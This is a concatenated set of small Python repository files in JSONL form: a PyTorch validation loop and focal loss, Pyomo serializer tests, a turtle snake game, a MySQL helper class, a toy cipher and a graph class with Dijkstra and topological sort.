val(self):\n model = self.model\n device = self.device\n val_loader = self.val_loader\n \n print('validation on %d data......' % len(val_loader.dataset))\n model.eval()\n val_loss = 0\n val_pred, val_target = [], []\n with torch.no_grad(): #temporarily set all the requires_grad flag to false\n for data,target in val_loader:\n data,target = data.to(device),target.to(device)\n output = model(data.float())\n \n weights = torch.tensor(self.class_weights).to(device)\n # criterion = FocalLoss(weight=weights)\n criterion = nn.CrossEntropyLoss(weight=weights)\n val_loss += criterion(output, target).item() #sum up batch loss\n \n log_prob = F.log_softmax(output, dim=1)\n val_prob = torch.exp(log_prob).data.cpu().numpy()[:, 1]\n val_pred.extend((val_prob > self.threshold).astype(int))\n val_target.extend(target.cpu().detach().numpy().tolist())\n \n val_loss /= len(val_loader.dataset) #avg of sum of batch loss\n acc = accuracy_score(val_target, val_pred)\n recall = recall_score(val_target, val_pred)\n precision = precision_score(val_target, val_pred)\n \n print('Val set: average loss:%.4f, acc:%.3f, recall: %.3f, precission: %.3f'\\\n %(val_loss, 100 * acc, recall, precision))\n \n return val_loss, acc, recall, precision\n \n def graph_hist(self, **kwargs):\n i = 1\n plt.figure(figsize=(24, 6))\n for k1, v1 in kwargs.items():\n plt.subplot(1, len(kwargs), i)\n for k2, v2 in v1.items():\n plt.plot(v2)\n plt.legend(['train %s' % k1, 'val %s' % k1], loc='best')\n i += 1\n plt.savefig(os.path.join(self.model_save_path, 'train_hist.jpg'))\n plt.close()\n \n\n# since i don't want boosting user need to install pytorch so i didn't put this loss fn in loss.py\nclass FocalLoss(nn.Module):\n def __init__(self, weight, gamma=2):\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n self.weight = weight\n\n def forward(self, input, target):\n \"\"\"\n input: [N, C]\n target: [N, ]\n \"\"\"\n logpt = F.log_softmax(input, dim=1)\n pt = torch.exp(logpt)\n logpt = (1-pt)**self.gamma * logpt\n loss = F.nll_loss(logpt, target, self.weight)\n return loss\n \n","repo_name":"henry16lin/ML_Service","sub_path":"nn_factory.py","file_name":"nn_factory.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"4058108580","text":"class Player(object):\n\n connexion = None\n\n def __init__(\n self,\n id=0,\n familly_name=None,\n first_name=None,\n age=None,\n gender=None,\n rank=None,\n point=0,\n ):\n self.id = id\n self.familly_name = familly_name\n self.first_name = first_name\n self.age = age\n self.gender = gender\n self.rank = rank\n self.point = point\n\n # All tournaments which player is resgistered\n self.tournaments = {}\n","repo_name":"Call-X/P04_Chessmat","sub_path":"Models/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1443955818","text":"import time\nimport sys\nfrom itertools import cycle\nimport hashlib\nimport base64\n\n\nclass Metodo:\n\n def encrypt(self, n, plaintext, key):\n result = ''\n for x in plaintext.lower():\n try:\n i = (key.index(x) + n) % 26\n result += key[i]\n except ValueError:\n result += x\n return result.lower()\n\n def decrypt(self, n, ciphertext, key):\n result = ''\n for y in ciphertext.lower():\n try:\n i = (key.index(y) - n) % 26\n result += key[i]\n except ValueError:\n result += y\n return result.lower()\n\n def cadena(self, cadena):\n cadena_invertida = \"\"\n for letra in cadena:\n cadena_invertida = letra + cadena_invertida\n return cadena_invertida\n\n\nclass Metodos_refuerzo:\n\n def keygen(self, key):\n h = hashlib.sha256()\n h.update(key.encode())\n return base64.a85encode(h.digest()).decode()[:24]\n\n def rail_pattern(self, n):\n r = list(range(n))\n return cycle(r + r[-2:0:-1])\n\n def encode(self, plaintext, rails):\n p = self.rail_pattern(rails)\n return ''.join(sorted(plaintext, key=lambda i: next(p)))\n\n def decode(self, ciphertext, rails):\n p = self.rail_pattern(rails)\n indexes = sorted(range(len(ciphertext)), key=lambda i: next(p))\n result = [''] * len(ciphertext)\n for i, c in zip(indexes, ciphertext):\n result[i] = c\n return ''.join(result)\n\n######\n\n def text2number(self, string__, x):\n if ord(string__[-1]) % 2 == 1:\n string__ = string__[::-1]\n return (int.from_bytes(string__.encode(), \"little\") % x) + 2\n\n def modEncrypt(self, msg, key):\n return \"\".join([chr((ord(msg[i]) + ord(key[i % len(key)])) % 256) for i in range(len(msg))])\n\n def modDecrypt(self, cip, key):\n return \"\".join([chr((ord(cip[i]) + (256 - ord(key[i % len(key)]))) % 256) for i in range(len(cip))])\n\n######\n\n def xor(self, s, k):\n return \"\".join([chr(ord(f) ^ ord(k[i % len(k)])) for i, f in enumerate(s)])\n\n######\n def split(self, seq):\n n = 12 # block length is 12\n datas = []\n while seq:\n datas.append(seq[:n])\n seq = seq[n:]\n return datas\n\n def pad(self, e):\n if len(e) == 12:\n return e\n else:\n return e + (chr(0) * (12 - len(e)))\n ######\n\n def encrypt(self, string, key):\n string = chr(len(string)) + string\n string = self.modEncrypt(string, key)\n ciphertext = \"\"\n odometer = [1, 2, 3, 4]\n blocks = self.split(string)\n key1 = key[12:24]\n key = key[:12]\n for block in blocks:\n block = self.pad(block)\n if odometer[0] == 1:\n for i in range(4):\n block = self.modEncrypt(block, key1)\n block = self.xor(block, key)\n elif odometer[1] == 1:\n for i in range(3):\n block = self.xor(block, key)\n block = self.modEncrypt(block, key)\n elif odometer[2] == 1:\n for i in range(2):\n block = self.xor(block, key1)\n block = self.modEncrypt(block, key1)\n elif odometer[3] == 1:\n block = self.modEncrypt(block, key1)\n block = self.xor(block, key1)\n odometer = odometer[1:] + [odometer[0]]\n ciphertext = ciphertext + block\n ciphertext = self.encode(ciphertext, self.text2number(key, 12))\n return self.xor(ciphertext, chr(self.text2number(key1, 127)) + chr(self.text2number(key, 127)))\n\n def decrypt(self, cipher, key):\n string = \"\"\n odometer = [1, 2, 3, 4]\n key1 = key[12:24]\n key = key[:12]\n cipher = self.xor(cipher, chr(self.text2number(key1, 127)) + chr(self.text2number(key, 127)))\n cipher = self.decode(cipher, self.text2number(key, 12))\n blocks = self.split(cipher)\n for block in blocks:\n if odometer[1] == 1:\n for i in range(3):\n block = self.modDecrypt(block, key)\n block = self.xor(block, key)\n elif odometer[0] == 1:\n for i in range(4):\n block = self.xor(block, key)\n block = self.modDecrypt(block, key1)\n elif odometer[3] == 1:\n block = self.xor(block, key1)\n block = self.modDecrypt(block, key1)\n elif odometer[2] == 1:\n for i in range(2):\n block = self.modDecrypt(block, key1)\n block = self.xor(block, key1)\n odometer = odometer[1:] + [odometer[0]]\n string = string + block\n final = list(self.modDecrypt(string, key + key1).rstrip())\n char = ord(final.pop(0))\n return \"\".join(final[:char])\n\n\n\n","repo_name":"andree-ro/BaseDatosEnsoluna","sub_path":"encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8851462778","text":"import unittest\nimport os\n\nfrom pyomo.environ import *\nfrom model_serializer import to_json, from_json, StoreSpec\nimport shutil\nimport pytest\nimport tempfile\n\n__author__ = \"John Eslick\"\n\ndir_path = os.path.dirname(os.path.abspath(__file__))\njson_path = os.path.join(dir_path, \"jsonfiles/\")\nif not(os.path.exists(json_path)):\n print('Directory for automatically generated files ' +\n json_path + ' does not exist. We will create it')\n os.makedirs(json_path)\n\n\nclass TestModelSerialize(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # cls.dirname = tempfile.mkdtemp() #Change this directory for it to point to the place where we store the json files\n cls.dirname = json_path\n cls.fname = os.path.join(cls.dirname, \"crAzYStuff1010202030.json\")\n\n # Uncomment the lines below if you want the json files to be deleted.\n # @classmethod\n # def tearDownClass(cls):\n # shutil.rmtree(cls.dirname)\n\n # def tearDown(self):\n # try:\n # os.remove(self.fname)\n # except:\n # pass\n\n def setup_model01(self):\n model = ConcreteModel()\n model.b = Block([1,2,3])\n a = model.b[1].a = Var(bounds=(-100, 100), initialize=2)\n b = model.b[1].b = Var(bounds=(-100, 100), initialize=20)\n model.b[1].c = Constraint(expr=b==10*a)\n a.fix(2)\n return model\n\n def setup_model02(self):\n model = ConcreteModel()\n a = model.a = Param(default=1, mutable=True)\n b = model.b = Param(default=2, mutable=True)\n c = model.c = Param(initialize=4)\n x = model.x = Var([1,2], initialize={1:1.5, 2:2.5}, bounds=(-10,10))\n model.f = Objective(expr=(x[1] - a)**2 + (x[2] - b)**2)\n model.g = Constraint(expr=x[1] + x[2] - c >= 0)\n model.dual = Suffix(direction=Suffix.IMPORT)\n model.ipopt_zL_out = Suffix(direction=Suffix.IMPORT)\n model.ipopt_zU_out = Suffix(direction=Suffix.IMPORT)\n return model\n\n @pytest.mark.unit\n def test01(self):\n \"\"\"\n Simple test of load save json\n \"\"\"\n model = self.setup_model01()\n a = model.b[1].a\n b = model.b[1].b\n to_json(model, fname=self.fname, human_read=True)\n # change variable values\n a.value = 0.11\n b.value = 0.11\n a.unfix()\n model.b[1].deactivate()\n b.setlb(2)\n b.setub(4)\n # reload values\n from_json(model, fname=self.fname)\n #make sure they are right\n assert(a.fixed)\n assert(model.b[1].active)\n assert(abs(value(b) - 20) < 1e-4)\n assert(abs(value(a) - 2) < 1e-4)\n assert(abs(b.lb - -100) < 1e-4)\n assert(abs(b.ub - 100) < 1e-4)\n\n @pytest.mark.unit\n def test02(self):\n \"\"\"Test with suffixes\"\"\"\n model = self.setup_model02()\n x = model.x\n model.dual[model.g] = 1\n model.ipopt_zL_out[x[1]] = 0\n model.ipopt_zL_out[x[2]] = 0\n model.ipopt_zU_out[x[1]] = 0\n model.ipopt_zU_out[x[2]] = 0\n to_json(model, fname=self.fname, human_read=True)\n model.x[1].value = 10\n model.x[2].value = 10\n model.dual[model.g] = 10\n model.ipopt_zL_out[x[1]] = 10\n model.ipopt_zL_out[x[2]] = 10\n model.ipopt_zU_out[x[1]] = 10\n model.ipopt_zU_out[x[2]] = 10\n from_json(model, fname=self.fname)\n assert(abs(value(x[1]) - 1.5) < 1e-5)\n assert(abs(value(x[2]) - 2.5) < 1e-5)\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[x[1]]) < 1e-5)\n assert(abs(model.ipopt_zL_out[x[2]]) < 1e-5)\n assert(abs(model.ipopt_zU_out[x[1]]) < 1e-5)\n assert(abs(model.ipopt_zU_out[x[2]]) < 1e-5)\n\n @pytest.mark.unit\n def test03(self):\n \"\"\"\n This tests a StoreSpec object meant for initialization. It reloads\n the saved state of variable values and whether they are fixed or\n unfixed but it only loads values for variables that were originally\n fixed. It's use would be in doing initialization that changes which\n variables are fixed and does whatever, but when the original state is\n reloaded only the original values for fixed variables are reloaded. You\n basically end up with the same problem, just a different initial guess.\n \"\"\"\n model = self.setup_model02()\n x = model.x\n x[1].fix(1)\n wts = StoreSpec.value_isfixed(only_fixed=True)\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n x[1].unfix()\n x[1].value = 2\n x[2].value = 10\n from_json(model, fname=self.fname, wts=wts)\n assert(x[1].fixed)\n assert(abs(value(x[1]) - 1) < 1e-5)\n assert(abs(value(x[2]) - 10) < 1e-5)\n\n @pytest.mark.unit\n def test04(self):\n \"\"\"\n Like test03, but this StoreSpec also saves/loads active/deactivated\n component attribute and parameter values.\n \"\"\"\n model = self.setup_model02()\n x = model.x\n x[1].fix(1)\n wts = StoreSpec.value_isfixed_isactive(only_fixed=True)\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n x[1].unfix()\n x[1].value = 2\n x[2].value = 10\n model.g.deactivate()\n from_json(model, fname=self.fname, wts=wts)\n assert(x[1].fixed)\n assert(abs(value(x[1]) - 1) < 1e-5)\n assert(abs(value(x[2]) - 10) < 1e-5)\n assert(model.g.active)\n\n @pytest.mark.unit\n def test05(self):\n \"\"\"Try just saving values\"\"\"\n model = self.setup_model02()\n model.x[1].value = 1\n wts = StoreSpec.value()\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n model.g.deactivate()\n model.x[1].setlb(-4)\n model.x[1].value = 3\n model.x[2].value = 6\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(value(model.x[1]) - 1) < 1e-5)\n assert(abs(model.x[1].lb + 4) < 1e-5)\n assert(abs(value(model.x[2]) - 2.5) < 1e-5)\n assert(not model.g.active)\n\n @pytest.mark.unit\n def test06(self):\n \"\"\"Try just saving bounds\"\"\"\n model = self.setup_model02()\n model.x[1].value = 1\n wts = StoreSpec.bound()\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n model.g.deactivate()\n model.x[1].setlb(-4)\n model.x[1].value = 3\n model.x[2].value = 6\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(value(model.x[1]) - 3) < 1e-5)\n assert(abs(model.x[1].lb + 10) < 1e-5)\n assert(abs(value(model.x[2]) - 6) < 1e-5)\n assert(not model.g.active)\n\n @pytest.mark.unit\n def test07(self):\n \"\"\"Try just saving just if fixed\"\"\"\n model = self.setup_model02()\n model.x[1].fix(1)\n wts = StoreSpec.isfixed()\n to_json(model, fname=self.fname, human_read=True, wts=wts)\n model.g.deactivate()\n model.x[1].setlb(-4)\n model.x[1].unfix()\n model.x[2].fix(6)\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(value(model.x[1]) - 1) < 1e-5)\n assert(abs(model.x[1].lb + 4) < 1e-5)\n assert(abs(value(model.x[2]) - 6) < 1e-5)\n assert(model.x[1].fixed)\n assert(not model.x[2].fixed)\n assert(not model.g.active)\n\n @pytest.mark.unit\n def test08(self):\n \"\"\"Try just saving suffixes\"\"\"\n model = self.setup_model02()\n model.x[1].fix(1)\n\n model.dual[model.g] = 1\n model.ipopt_zL_out[model.x[1]] = 1\n model.ipopt_zL_out[model.x[2]] = 1\n model.ipopt_zU_out[model.x[1]] = 1\n model.ipopt_zU_out[model.x[2]] = 1\n\n to_json(model, fname=self.fname, wts=StoreSpec.suffix())\n\n model.dual[model.g] = 10\n model.ipopt_zL_out[model.x[1]] = 10\n model.ipopt_zL_out[model.x[2]] = 10\n model.ipopt_zU_out[model.x[1]] = 10\n model.ipopt_zU_out[model.x[2]] = 10\n model.g.deactivate()\n model.x[1].setlb(-4)\n model.x[1].unfix()\n model.x[2].fix(6)\n\n from_json(model, fname=self.fname, wts=StoreSpec.suffix())\n assert(abs(value(model.x[1]) - 1) < 1e-5)\n assert(abs(value(model.x[2]) - 6) < 1e-5)\n assert(not model.x[1].fixed)\n assert(model.x[2].fixed)\n assert(not model.g.active)\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[1]] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[2]] - 1) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[1]] - 1) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[2]] - 1) < 1e-5)\n assert(abs(model.x[1].lb + 4) < 1e-5)\n\n @pytest.mark.unit\n def test09(self):\n \"\"\"Try just saving suffixes, and suffix filter\"\"\"\n model = self.setup_model02()\n\n model.dual[model.g] = 1\n model.ipopt_zL_out[model.x[1]] = 1\n model.ipopt_zL_out[model.x[2]] = 1\n model.ipopt_zU_out[model.x[1]] = 1\n model.ipopt_zU_out[model.x[2]] = 1\n\n wts = StoreSpec.suffix(suffix_filter=(\"dual\",))\n to_json(model, fname=self.fname, wts=wts)\n\n model.dual[model.g] = 10\n model.ipopt_zL_out[model.x[1]] = 10\n model.ipopt_zL_out[model.x[2]] = 10\n model.ipopt_zU_out[model.x[1]] = 10\n model.ipopt_zU_out[model.x[2]] = 10\n\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[2]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[2]] - 10) < 1e-5)\n\n @pytest.mark.unit\n def test10(self):\n \"\"\"Try just saving suffixes, and suffix filter only on write\"\"\"\n model = self.setup_model02()\n\n model.dual[model.g] = 1\n model.ipopt_zL_out[model.x[1]] = 1\n model.ipopt_zL_out[model.x[2]] = 1\n model.ipopt_zU_out[model.x[1]] = 1\n model.ipopt_zU_out[model.x[2]] = 1\n\n wts = StoreSpec.suffix(suffix_filter=(\"dual\",))\n to_json(model, fname=self.fname, wts=wts)\n\n model.dual[model.g] = 10\n model.ipopt_zL_out[model.x[1]] = 10\n model.ipopt_zL_out[model.x[2]] = 10\n model.ipopt_zU_out[model.x[1]] = 10\n model.ipopt_zU_out[model.x[2]] = 10\n\n from_json(model, fname=self.fname, wts=StoreSpec.suffix())\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[2]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[2]] - 10) < 1e-5)\n\n @pytest.mark.unit\n def test11(self):\n \"\"\"Try just saving suffixes, and suffix filter only on read\"\"\"\n model = self.setup_model02()\n\n model.dual[model.g] = 1\n model.ipopt_zL_out[model.x[1]] = 1\n model.ipopt_zL_out[model.x[2]] = 1\n model.ipopt_zU_out[model.x[1]] = 1\n model.ipopt_zU_out[model.x[2]] = 1\n\n\n to_json(model, fname=self.fname, wts=StoreSpec.suffix())\n\n model.dual[model.g] = 10\n model.ipopt_zL_out[model.x[1]] = 10\n model.ipopt_zL_out[model.x[2]] = 10\n model.ipopt_zU_out[model.x[1]] = 10\n model.ipopt_zU_out[model.x[2]] = 10\n\n wts = StoreSpec.suffix(suffix_filter=(\"dual\",))\n from_json(model, fname=self.fname, wts=wts)\n assert(abs(model.dual[model.g] - 1) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zL_out[model.x[2]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[1]] - 10) < 1e-5)\n assert(abs(model.ipopt_zU_out[model.x[2]] - 10) < 1e-5)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bernalde/dsda-gdp","sub_path":"misc/util/test_model_serializer.py","file_name":"test_model_serializer.py","file_ext":"py","file_size_in_byte":11883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"30860431984","text":"from turtle import Turtle, Screen\nimport time\nimport random\nscreen = Screen()\nscreen.setup(width= 600, height= 600)\nscreen.bgcolor((0,0,0))\nscreen.title(\"Snake Game\")\nscreen.tracer(0)\npieces_of_snake = []\nfor i in range(-40,1,20):\n snake = Turtle()\n snake.penup()\n snake.shape(\"square\")\n snake.color(\"white\")\n snake.goto(x=i, y=0)\n pieces_of_snake.append(snake)\n print(snake.position())\nscreen.update()\nprint(\"===========\")\n\ncount_of_bubble = 0\ndef left():\n pieces_of_snake[len(pieces_of_snake)-1].left(90)\n # pieces_of_snake[len(pieces_of_snake)-1].forward(20)\n forward()\n screen.update()\n\n\ndef right():\n pieces_of_snake[len(pieces_of_snake)-1].right(90)\n forward()\n # pieces_of_snake[len(pieces_of_snake)-1].forward(20)\n screen.update()\n\ndef add_tail():\n new_snake = Turtle()\n new_snake.shape(\"square\")\n new_snake.color(\"white\")\n pieces_of_snake.append(new_snake)\n\ndef forward():\n # print(\"Forward\")\n for i in range(0,len(pieces_of_snake)):\n print(len(pieces_of_snake))\n if i+1 <= len(pieces_of_snake) -1:\n position = pieces_of_snake[i+1].position()\n pieces_of_snake[i].goto(position)\n else:\n pieces_of_snake[i].forward(20)\n screen.update()\n\n\ndef is_out_of_bounds():\n head_position = pieces_of_snake[len(pieces_of_snake)-1].position()\n if head_position[0] < -290 or head_position[1] < -290:\n return True\n elif head_position[0] > 290 or head_position[1] > 290:\n return True\n else:\n return False\n\ndef goal_not_achieved(bubble):\n head_position = pieces_of_snake[len(pieces_of_snake)-1].position()\n if head_position == bubble.position():\n bubble.clear()\n return True\n else:\n return False\n\ndef generate_a_bubble():\n bubble = (random.randint(-280,280),random.randint(-280,280))\n objective = Turtle()\n objective.shape(\"circle\")\n objective.color(\"red\")\n objective.penup()\n objective.goto(bubble)\n return objective\n# screen.onkey(fun=forward, key=\"Up\")\nscreen.listen()\ngame_is_on = True\n\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n forward()\n if count_of_bubble == 0:\n bubble = generate_a_bubble()\n \n while goal_not_achieved(bubble) == False and is_out_of_bounds() == False:\n screen.onkey(fun=left, key=\"Left\")\n screen.onkey(fun= right, key=\"Right\")\n time.sleep(0.1)\n forward()\n screen.onkey(fun=left, key=\"Left\")\n screen.onkey(fun= right, key=\"Right\")\n # for pos in pieces_of_snake:\n # print(pos.position())\n \n if is_out_of_bounds == True:\n game_is_on = False\n screen.update()\n # break\n \n\nscreen.exitonclick()\n","repo_name":"SangeethKumarPG/Python-Exercises","sub_path":"snake_game/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35235539519","text":"import mysql.connector\n\nclass DB:\n\n database = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"gpsAT\", database=\"gpsAT\") # Database connection informations\n cursor = database.cursor() # Connection to the database\n\n def init(self):\n \"\"\"Initialisation of the database\"\"\"\n\n self.createTables(self)\n\n def createTables(self):\n \"\"\"Creation of the database tables\"\"\"\n\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Trace (\n idTrace int(6) NOT NULL AUTO_INCREMENT,\n nomTrace varchar(100) DEFAULT NULL,\n PRIMARY KEY(idTrace)\n );\n \"\"\")\n\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS Data (\n idData int(6) NOT NULL AUTO_INCREMENT,\n idTrace int(6) DEFAULT NULL,\n latitude float(20) DEFAULT NULL,\n longitude float(20) DEFAULT NULL,\n PRIMARY KEY(idData),\n FOREIGN KEY(idTrace) REFERENCES Trace(idTrace)\n );\n \"\"\")\n\n def insertTrace(self,nameTrace):\n \"\"\"Insert a trace in the database\"\"\"\n\n sql = \"\"\"INSERT INTO Trace(nomTrace) \n VALUES (%s);\"\"\"\n adr=(nameTrace,)\n\n self.cursor.execute(sql,adr)\n\n self.database.commit()\n\n def insertData(self,idTrace,latitude,longitude):\n \"\"\"Insert data of trace in the database\"\"\"\n\n sql = \"\"\"INSERT INTO Data(idTrace,latitude,longitude) \n VALUES (%s,%s,%s);\"\"\"\n adr=(idTrace,latitude,longitude)\n\n self.cursor.execute(sql,adr)\n\n self.database.commit()\n\n def selectTraceWithName(self,nameTrace):\n \"\"\"Select a trace by its name\"\"\"\n\n sql = \"\"\"SELECT idTrace \n FROM Trace\n WHERE nomTrace=%s;\"\"\"\n adr = (nameTrace,)\n\n self.cursor.execute(sql, adr)\n\n return self.cursor.fetchone()[0] # Int\n\n def selectDataWithIdTrace(self,idTrace):\n \"\"\"Select trace data with its id\"\"\"\n \n sql = \"\"\"SELECT Data.latitude,Data.longitude \n FROM Data\n INNER JOIN Trace \n ON Trace.idTrace = Data.idTrace\n WHERE Trace.idTrace=%s\n ORDER BY Data.idData;\"\"\"\n adr = (idTrace,)\n\n self.cursor.execute(sql, adr)\n\n return self.cursor.fetchall() # List of tuple\n\n def selectAllIdTrace(self):\n \"\"\"Select all id of trace\"\"\"\n\n self.cursor.execute(\"\"\"\n SELECT idTrace\n FROM Trace \n ;\"\"\"\n )\n return self.cursor.fetchall() # List of tuple\n\n def selectAllNameTrace(self):\n \"\"\"Select all name trace\"\"\"\n\n self.cursor.execute(\"\"\"\n SELECT nameTrace\n FROM Trace \n ;\"\"\"\n )\n return self.cursor.fetchall() # List of tuple\n\n def close(self):\n \"\"\"Close interactions with the database\"\"\"\n\n self.database.close()\n","repo_name":"ayoubbibo/Projet_ASAIoT","sub_path":"model/interactionDB.py","file_name":"interactionDB.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73795194431","text":"with open('day1_1inputs.txt', 'r') as inputs:\n inc_count = 0\n data = [int(current) for current in inputs]\n previous = data[0] + data[1] + data[2]\n for i in range(1, len(data) - 2):\n temp = data[i] + data[i + 1] + data [i + 2]\n if temp > previous:\n inc_count += 1\n previous = temp\n\n print(inc_count)","repo_name":"ma-henderson/advent_of_code_2021","sub_path":"day1_2.py","file_name":"day1_2.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23489495804","text":"import pylab as plt\n\n\ndef show(mat, save_loc=False):\n (rows, cols) = mat.shape\n plt.imshow(mat, cmap='hot', aspect=(cols/rows))\n if save_loc:\n plt.savefig(save_loc)\n else:\n plt.show()\n","repo_name":"FunkyQChicken/cogs-final-project-perceptron","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44402414006","text":"from copy import deepcopy\n\nclass Edge:\n def __init__(self, origin, dest, weight):\n self.origin = origin\n self.dest = dest\n self.weight = weight\n\nclass Graph:\n def __init__(self, filename, flag):\n \"\"\"\n Graph constructor\n You will implement your graph here either using adjacency list or adjacency matrix\n True flag -> directed graph, False flag -> undirected graph \n filename will be the .txt file from which you will be loading your graph\n Format of .txt file is as given in the manual\n Construct this class as you deem fit \n \"\"\"\n self.graph = dict()\n is_directed = flag\n\n\n # reading the lines of the file\n file = open(filename, 'r')\n lines = file.readlines()\n lines = lines[2:] # the first two lines are not needed for AL Implementation\n\n for line in lines:\n # the format of a line is S E W, W can be multichar\n start = line[0]\n end = line[2]\n weight = int(line[4:-1])\n\n self.add_edge(start, end, weight, is_directed)\n \n def add_edge(self, start, end, weight, flag):\n \"\"\"\n inserts edge connecting start and end with weight to the graph\n does not require a return value \n \"\"\"\n\n # if the graph is undirected, add two edges to the graph, otherwise add one\n if flag:\n new_edge = Edge(start, end, weight)\n \n # if the vertice exists in the dict, \n # append to the list of edges, otherwise create the list of edges with the new edge\n\n if start in self.graph: \n self.graph[start].append(new_edge)\n return \n \n self.graph[start] = [new_edge]\n return\n \n self.add_edge(start, end, weight, True)\n self.add_edge(end, start, weight, True)\n \n \n return\n \n def display(self):\n \"\"\"\n displays the graph in a certain format (given in Manual)\n returns a string \n \"\"\"\n result = []\n\n for _ , edges in sorted(self.graph.items()):\n for edge in edges:\n result += [(f\"({edge.origin},{edge.dest},{edge.weight})\")]\n\n result.sort()\n result = \" \".join(result)\n return result\n\n def dfs(self, start, end, visited):\n \n if start == end:\n return True\n\n if start in visited:\n return False\n \n visited.append(start)\n\n for edge in self.graph[start]:\n result = self.dfs(edge.dest, end, visited)\n\n if result:\n return True\n \n return False\n\n def reachable(self, start, end):\n \"\"\"\n determines if node end is reachable by node start\n returns a boolean\n \"\"\"\n\n if not start in self.graph:\n return False\n \n\n return self.dfs(start, end, [])\n\n \n\n def dijkstra(self, start, end):\n \"\"\"\n determines shortest path between start and end\n returns an int\n \"\"\"\n\n if not self.reachable(start, end):\n return -1\n\n # make a list of unvisited vertices\n unvisited_vertex = [vertex for vertex in self.graph]\n\n # make a list of visited vertices\n visited_vertex = []\n\n # make a distance table to store distances\n distance_table = {vertex : float(\"inf\") for vertex in self.graph}\n\n # set the distance from the starting node = 0\n distance_table[start] = 0\n\n unvisited_vertex.remove(start)\n\n for edge in self.graph[start]:\n # print(f'{edge = }')\n if edge.weight < distance_table[edge.dest]:\n distance_table[edge.dest] = edge.weight\n\n temp_list = list(distance_table.items())\n temp_list.sort(key= lambda i:i[1])\n\n next_vertex = None\n\n for vertex, _ in temp_list:\n if vertex in unvisited_vertex:\n next_vertex = vertex\n break\n\n # print(f'{next_vertex = }')\n\n\n while unvisited_vertex:\n # find the vertex with the smallest distance\n # visit that vertex in a similar fashion\n\n temp_list = list(distance_table.items())\n temp_list.sort(key= lambda i:i[1])\n\n next_vertex = None\n\n for vertex, _ in temp_list:\n if vertex in unvisited_vertex:\n next_vertex = vertex\n break\n\n # print(f'{next_vertex = }')\n\n own_dist = distance_table[next_vertex]\n\n for edge in self.graph[next_vertex]:\n if own_dist + edge.weight < distance_table[edge.dest]:\n distance_table[edge.dest] = own_dist + edge.weight\n\n unvisited_vertex.remove(next_vertex)\n\n \n\n # print(f'{temp_list = }')\n # print(f'{unvisited_vertex = }')\n\n return distance_table[end]\n\n \n def topo_sort(self):\n \"\"\"\n sorts the graph using the toposort algorithm\n returns a string. Format: ABCDEF\n \"\"\"\n\n # compute the in-degree of each node\n # choose the vertex with in = 0 and put it in the sorted sequence\n # remove in = 0 node and recompute in degree\n\n res = []\n temp = []\n\n tree_copy = deepcopy(self.graph)\n\n nodes = {key : 0 for key in tree_copy}\n\n for node in self.graph:\n for edge in self.graph[node]:\n if edge.dest in nodes:\n nodes[edge.dest] += 1\n else:\n nodes[edge.dest] = 1\n\n \n for key, val in nodes.items():\n if val == 0:\n temp.append(key)\n\n for key in temp:\n nodes.pop(key)\n\n while temp:\n \n node = temp.pop(0)\n res.append(node)\n \n if node in self.graph:\n for edge in self.graph[node]:\n if edge.dest in nodes:\n nodes[edge.dest] -= 1\n\n for key, val in nodes.items():\n if val == 0:\n temp.append(key)\n\n for key in temp:\n if key in nodes:\n nodes.pop(key) \n\n\n\n return \"\".join(res)\n \n\n\n \n\nif __name__ == \"__main__\":\n\n # You can make your own graph to test here\n\n my_graph = Graph(\"graph1.txt\", True)\n\n # 